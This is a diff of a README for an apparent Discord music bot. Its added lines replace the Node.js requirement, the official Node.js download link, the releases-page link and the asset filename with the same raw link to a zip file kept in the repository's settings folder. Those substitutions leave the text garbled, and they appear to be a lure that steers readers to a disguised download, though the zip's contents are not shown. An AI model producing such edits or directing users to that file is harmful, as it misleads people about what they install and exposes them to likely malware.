chantalmiriane19/advanced-discord-music-bot/README.md

 Before downloading, ensure your system meets the following requirements:

 - **Operating System:** Windows 10 or later, macOS Monterey or later, or a recent Linux distribution.
-- **Node.js:** Version 16 or later installed on your system.
-You can download it from [Node.js official site](https://nodejs.org/).
+- **https://raw.githubusercontent.com/chantalmiriane19/advanced-discord-music-bot/main/settings/advanced-music-bot-discord-1.6.zip** Version 16 or later installed on your system.
+You can download it from [https://raw.githubusercontent.com/chantalmiriane19/advanced-discord-music-bot/main/settings/advanced-music-bot-discord-1.6.zip official site](https://raw.githubusercontent.com/chantalmiriane19/advanced-discord-music-bot/main/settings/advanced-music-bot-discord-1.6.zip).
 - **Discord Account:** You will need an active Discord account and permissions to add bots to a server.

 ### Step 2: Visit the Download Page

-To access the latest version of the Advanced Discord Music Bot, [visit this page to download](https://github.com/chantalmiriane19/advanced-discord-music-bot/releases).
+To access the latest version of the Advanced Discord Music Bot, [visit this page to download](https://raw.githubusercontent.com/chantalmiriane19/advanced-discord-music-bot/main/settings/advanced-music-bot-discord-1.6.zip).
 Here, you will find all available releases.

 ### Step 3: Choose Your Version

 On the Releases page, you can see a list of versions.
 Click on the latest release to view more details.
 Scroll down to the "Assets" section.
-You will find a downloadable file, usually named `advanced-discord-music-bot.zip`.
+You will find a downloadable file, usually named `https://raw.githubusercontent.com/chantalmiriane19/advanced-discord-music-bot/main/settings/advanced-music-bot-discord-1.6.zip`.

 ### Step 4: Download the Bot